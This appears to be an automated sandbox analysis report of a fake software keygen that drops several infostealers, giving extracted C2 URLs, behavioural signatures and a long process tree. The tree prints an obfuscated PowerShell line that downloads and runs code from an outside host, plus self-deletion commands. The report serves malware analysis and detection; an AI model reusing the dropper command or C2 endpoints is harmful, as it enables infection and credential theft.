Resubmissions

06-10-2022 21:06

221006-zxrwaaaga6 10

13-04-2021 12:47

210413-myxlaxh4ta 10

12-04-2021 13:54

210412-6sz4v79f2x 10

Analysis

  • max time kernel
    228s
  • max time network
    425s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    12-04-2021 13:54

Errors

Reason
Machine shutdown

General

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://labsclub.com/welcome

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

raccoon

Botnet

a6bfe7e504db71e25642b830fd9b2c4366cf882a

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • ElysiumStealer

    ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Blocklisted process makes network request 5 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks for any installed AV software in registry 1 TTPs 64 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 23 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 5 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 54 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Runs ping.exe 1 TTPs 6 IoCs
  • Script User-Agent 11 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:68
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2788
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:2496
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2708
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2696
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2476
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2424
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" https://keygenit.com/d/3e16ccf432109nspn247.html
          1⤵
          • Modifies Internet Explorer Phishing Filter
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:636
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:636 CREDAT:82945 /prefetch:2
            2⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:3964
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1852
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1404
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Themes
              1⤵
                PID:1212
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1204
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1076
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                      PID:596
                    • C:\Windows\System32\rundll32.exe
                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                      1⤵
                        PID:3064
                      • C:\Users\Admin\AppData\Local\Temp\Temp2_R_wipe_clean_11_serial_key_gen.zip\R_wipe_clean_11_serial_key_gen.exe
                        "C:\Users\Admin\AppData\Local\Temp\Temp2_R_wipe_clean_11_serial_key_gen.zip\R_wipe_clean_11_serial_key_gen.exe"
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1324
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3920
                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                            keygen-pr.exe -p83fsase3Ge
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:3780
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                              4⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:2840
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                5⤵
                                  PID:2412
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                              keygen-step-1.exe
                              3⤵
                              • Executes dropped EXE
                              PID:1492
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                              keygen-step-2.exe
                              3⤵
                              • Executes dropped EXE
                              • Modifies system certificate store
                              • Suspicious use of WriteProcessMemory
                              PID:2208
                              • C:\Users\Admin\AppData\Roaming\DCA0.tmp.exe
                                "C:\Users\Admin\AppData\Roaming\DCA0.tmp.exe"
                                4⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:3252
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\DCA0.tmp.exe"
                                  5⤵
                                    PID:5420
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /T 10 /NOBREAK
                                      6⤵
                                      • Delays execution with timeout.exe
                                      PID:6876
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:2992
                                  • C:\Windows\SysWOW64\PING.EXE
                                    ping 127.0.0.1
                                    5⤵
                                    • Runs ping.exe
                                    PID:1568
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                keygen-step-3.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:2344
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3976
                                  • C:\Windows\SysWOW64\PING.EXE
                                    ping 1.1.1.1 -n 1 -w 3000
                                    5⤵
                                    • Runs ping.exe
                                    PID:2256
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                keygen-step-4.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:888
                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of WriteProcessMemory
                                  PID:3240
                                  • C:\Users\Admin\AppData\Local\Temp\QDUDP8UWKX\multitimer.exe
                                    "C:\Users\Admin\AppData\Local\Temp\QDUDP8UWKX\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                                    5⤵
                                    • Executes dropped EXE
                                    • Maps connected drives based on registry
                                    • Drops file in Windows directory
                                    • Enumerates system info in registry
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4032
                                    • C:\Users\Admin\AppData\Local\Temp\QDUDP8UWKX\multitimer.exe
                                      "C:\Users\Admin\AppData\Local\Temp\QDUDP8UWKX\multitimer.exe" 1 3.1618235830.607451b68056f 101
                                      6⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      PID:4792
                                      • C:\Users\Admin\AppData\Local\Temp\QDUDP8UWKX\multitimer.exe
                                        "C:\Users\Admin\AppData\Local\Temp\QDUDP8UWKX\multitimer.exe" 2 3.1618235830.607451b68056f
                                        7⤵
                                        • Executes dropped EXE
                                        • Checks for any installed AV software in registry
                                        PID:4936
                                        • C:\Users\Admin\AppData\Local\Temp\5jfjco2kuc1\rvq3rp0mj0e.exe
                                          "C:\Users\Admin\AppData\Local\Temp\5jfjco2kuc1\rvq3rp0mj0e.exe" /VERYSILENT
                                          8⤵
                                          • Executes dropped EXE
                                          PID:744
                                          • C:\Users\Admin\AppData\Local\Temp\is-A1TGD.tmp\rvq3rp0mj0e.tmp
                                            "C:\Users\Admin\AppData\Local\Temp\is-A1TGD.tmp\rvq3rp0mj0e.tmp" /SL5="$30456,140785,56832,C:\Users\Admin\AppData\Local\Temp\5jfjco2kuc1\rvq3rp0mj0e.exe" /VERYSILENT
                                            9⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of FindShellTrayWindow
                                            PID:5064
                                            • C:\Users\Admin\AppData\Local\Temp\is-3DMF8.tmp\apipostback.exe
                                              "C:\Users\Admin\AppData\Local\Temp\is-3DMF8.tmp\apipostback.exe" adan adan
                                              10⤵
                                              • Executes dropped EXE
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:5956
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\W1hagL6Nv.dll"
                                                11⤵
                                                  PID:832
                                                  • C:\Windows\SysWOW64\regsvr32.exe
                                                    regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\W1hagL6Nv.dll"
                                                    12⤵
                                                    • Loads dropped DLL
                                                    PID:5140
                                                    • C:\Windows\system32\regsvr32.exe
                                                      /s "C:\Users\Admin\AppData\Local\Temp\W1hagL6Nv.dll"
                                                      13⤵
                                                        PID:5240
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\W1hagL6Nv.dll2O393SXLy.dll"
                                                    11⤵
                                                      PID:4872
                                                      • C:\Windows\SysWOW64\regsvr32.exe
                                                        regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\W1hagL6Nv.dll2O393SXLy.dll"
                                                        12⤵
                                                        • Executes dropped EXE
                                                        • Adds Run key to start application
                                                        PID:6784
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                      11⤵
                                                        PID:4524
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                          12⤵
                                                            PID:2672
                                                  • C:\Users\Admin\AppData\Local\Temp\auq5zi05rxz\Setup3310.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\auq5zi05rxz\Setup3310.exe" /Verysilent /subid=577
                                                    8⤵
                                                    • Executes dropped EXE
                                                    PID:4176
                                                    • C:\Users\Admin\AppData\Local\Temp\is-VEBM0.tmp\Setup3310.tmp
                                                      "C:\Users\Admin\AppData\Local\Temp\is-VEBM0.tmp\Setup3310.tmp" /SL5="$3044E,138429,56832,C:\Users\Admin\AppData\Local\Temp\auq5zi05rxz\Setup3310.exe" /Verysilent /subid=577
                                                      9⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of FindShellTrayWindow
                                                      PID:4544
                                                      • C:\Users\Admin\AppData\Local\Temp\is-GEKAM.tmp\Setup.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\is-GEKAM.tmp\Setup.exe" /Verysilent
                                                        10⤵
                                                        • Executes dropped EXE
                                                        • Drops file in Program Files directory
                                                        PID:5484
                                                        • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe
                                                          "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe"
                                                          11⤵
                                                          • Executes dropped EXE
                                                          • Adds Run key to start application
                                                          PID:6064
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            12⤵
                                                            • Executes dropped EXE
                                                            PID:6168
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            12⤵
                                                            • Executes dropped EXE
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:5012
                                                        • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe
                                                          "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"
                                                          11⤵
                                                            PID:6072
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
                                                              12⤵
                                                                PID:6884
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /im RunWW.exe /f
                                                                  13⤵
                                                                  • Kills process with taskkill
                                                                  PID:5532
                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                  timeout /t 6
                                                                  13⤵
                                                                  • Loads dropped DLL
                                                                  • Delays execution with timeout.exe
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:5240
                                                            • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe
                                                              "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe"
                                                              11⤵
                                                              • Executes dropped EXE
                                                              PID:6100
                                                            • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe
                                                              "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe"
                                                              11⤵
                                                              • Executes dropped EXE
                                                              • Drops file in Program Files directory
                                                              PID:6124
                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
                                                                12⤵
                                                                  PID:6380
                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                                                                    13⤵
                                                                    • Loads dropped DLL
                                                                    • Modifies registry class
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:5812
                                                              • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe
                                                                "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe"
                                                                11⤵
                                                                • Executes dropped EXE
                                                                PID:4572
                                                                • C:\Users\Admin\AppData\Local\Temp\8UIDN4UDTB\multitimer.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\8UIDN4UDTB\multitimer.exe" 0 306065bb10421b26.04333812 0 103
                                                                  12⤵
                                                                  • Executes dropped EXE
                                                                  • Drops file in Windows directory
                                                                  PID:7044
                                                                  • C:\Users\Admin\AppData\Local\Temp\8UIDN4UDTB\multitimer.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\8UIDN4UDTB\multitimer.exe" 1 3.1618235876.607451e4a035d 103
                                                                    13⤵
                                                                    • Executes dropped EXE
                                                                    • Adds Run key to start application
                                                                    PID:6932
                                                                    • C:\Users\Admin\AppData\Local\Temp\8UIDN4UDTB\multitimer.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\8UIDN4UDTB\multitimer.exe" 2 3.1618235876.607451e4a035d
                                                                      14⤵
                                                                      • Checks for any installed AV software in registry
                                                                      PID:6300
                                                                      • C:\Users\Admin\AppData\Local\Temp\w21ut20zgsb\Setup3310.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\w21ut20zgsb\Setup3310.exe" /Verysilent /subid=577
                                                                        15⤵
                                                                          PID:4836
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-RSBNF.tmp\Setup3310.tmp
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-RSBNF.tmp\Setup3310.tmp" /SL5="$30606,138429,56832,C:\Users\Admin\AppData\Local\Temp\w21ut20zgsb\Setup3310.exe" /Verysilent /subid=577
                                                                            16⤵
                                                                            • Loads dropped DLL
                                                                            • Checks whether UAC is enabled
                                                                            • Modifies registry class
                                                                            PID:6980
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-B8D3E.tmp\Setup.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-B8D3E.tmp\Setup.exe" /Verysilent
                                                                              17⤵
                                                                                PID:7448
                                                                          • C:\Users\Admin\AppData\Local\Temp\hyzwd5h00js\app.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\hyzwd5h00js\app.exe" /8-23
                                                                            15⤵
                                                                              PID:4500
                                                                              • C:\Users\Admin\AppData\Local\Temp\hyzwd5h00js\app.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\hyzwd5h00js\app.exe" /8-23
                                                                                16⤵
                                                                                  PID:7336
                                                                              • C:\Users\Admin\AppData\Local\Temp\ahkp4wx12bc\vpn.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\ahkp4wx12bc\vpn.exe" /silent /subid=482
                                                                                15⤵
                                                                                  PID:5960
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-1OE2I.tmp\vpn.tmp
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-1OE2I.tmp\vpn.tmp" /SL5="$404F8,15170975,270336,C:\Users\Admin\AppData\Local\Temp\ahkp4wx12bc\vpn.exe" /silent /subid=482
                                                                                    16⤵
                                                                                    • Loads dropped DLL
                                                                                    PID:5992
                                                                                • C:\Users\Admin\AppData\Local\Temp\5ypxypcmhwf\setup_10.2_us3.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\5ypxypcmhwf\setup_10.2_us3.exe" /silent
                                                                                  15⤵
                                                                                    PID:6936
                                                                            • C:\Users\Admin\AppData\Local\Temp\4LP1O551OS\setups.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\4LP1O551OS\setups.exe" ll
                                                                              12⤵
                                                                              • Executes dropped EXE
                                                                              PID:7108
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-T991P.tmp\setups.tmp
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-T991P.tmp\setups.tmp" /SL5="$20592,726852,244736,C:\Users\Admin\AppData\Local\Temp\4LP1O551OS\setups.exe" ll
                                                                                13⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:6184
                                                                          • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe
                                                                            "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
                                                                            11⤵
                                                                            • Executes dropped EXE
                                                                            PID:5776
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-LI1MK.tmp\LabPicV3.tmp
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-LI1MK.tmp\LabPicV3.tmp" /SL5="$105EA,136934,53248,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
                                                                              12⤵
                                                                                PID:4040
                                                                                • C:\Users\Admin\AppData\Local\Temp\is-SU58R.tmp\alpATCHInO.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-SU58R.tmp\alpATCHInO.exe" /S /UID=lab214
                                                                                  13⤵
                                                                                  • Drops file in Drivers directory
                                                                                  • Executes dropped EXE
                                                                                  • Adds Run key to start application
                                                                                  • Drops file in Program Files directory
                                                                                  PID:5788
                                                                                  • C:\Program Files\Windows Defender\VGUDBXQDOR\prolab.exe
                                                                                    "C:\Program Files\Windows Defender\VGUDBXQDOR\prolab.exe" /VERYSILENT
                                                                                    14⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:6652
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-91878.tmp\prolab.tmp
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-91878.tmp\prolab.tmp" /SL5="$20614,575243,216576,C:\Program Files\Windows Defender\VGUDBXQDOR\prolab.exe" /VERYSILENT
                                                                                      15⤵
                                                                                      • Executes dropped EXE
                                                                                      • Drops file in Program Files directory
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:6188
                                                                                  • C:\Users\Admin\AppData\Local\Temp\c3-d174f-22c-8ceb4-b21b7da847879\Taedawizhuly.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\c3-d174f-22c-8ceb4-b21b7da847879\Taedawizhuly.exe"
                                                                                    14⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4348
                                                                                    • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                      dw20.exe -x -s 2212
                                                                                      15⤵
                                                                                        PID:7912
                                                                                    • C:\Users\Admin\AppData\Local\Temp\1f-92587-cd0-8b18a-4eee0c082bc33\Nuzhylaeqoqy.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\1f-92587-cd0-8b18a-4eee0c082bc33\Nuzhylaeqoqy.exe"
                                                                                      14⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:3704
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mwi4iuhg.uov\gaooo.exe & exit
                                                                                        15⤵
                                                                                          PID:5116
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\412uq3xk.32a\jgjg_note8876.exe & exit
                                                                                          15⤵
                                                                                            PID:6112
                                                                                            • C:\Users\Admin\AppData\Local\Temp\412uq3xk.32a\jgjg_note8876.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\412uq3xk.32a\jgjg_note8876.exe
                                                                                              16⤵
                                                                                                PID:1624
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\02cpa3d0.hku\google-game.exe & exit
                                                                                              15⤵
                                                                                                PID:4888
                                                                                                • C:\Users\Admin\AppData\Local\Temp\02cpa3d0.hku\google-game.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\02cpa3d0.hku\google-game.exe
                                                                                                  16⤵
                                                                                                    PID:7192
                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\patch.dll",patch
                                                                                                      17⤵
                                                                                                        PID:8096
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4tp0o04c.3ka\askinstall31.exe & exit
                                                                                                    15⤵
                                                                                                      PID:1240
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\4tp0o04c.3ka\askinstall31.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\4tp0o04c.3ka\askinstall31.exe
                                                                                                        16⤵
                                                                                                          PID:7596
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                                                            17⤵
                                                                                                              PID:7304
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                taskkill /f /im chrome.exe
                                                                                                                18⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:7652
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hlofwypx.pag\toolspab1.exe & exit
                                                                                                          15⤵
                                                                                                            PID:7360
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\hlofwypx.pag\toolspab1.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\hlofwypx.pag\toolspab1.exe
                                                                                                              16⤵
                                                                                                                PID:7880
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\hlofwypx.pag\toolspab1.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\hlofwypx.pag\toolspab1.exe
                                                                                                                  17⤵
                                                                                                                    PID:8168
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vka3uzs0.j4d\setup_10.2_mix.exe & exit
                                                                                                                15⤵
                                                                                                                  PID:5780
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\vka3uzs0.j4d\setup_10.2_mix.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\vka3uzs0.j4d\setup_10.2_mix.exe
                                                                                                                    16⤵
                                                                                                                      PID:7016
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\osl2s4aq.pna\a1207b55.exe & exit
                                                                                                                    15⤵
                                                                                                                      PID:5128
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\osl2s4aq.pna\a1207b55.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\osl2s4aq.pna\a1207b55.exe
                                                                                                                        16⤵
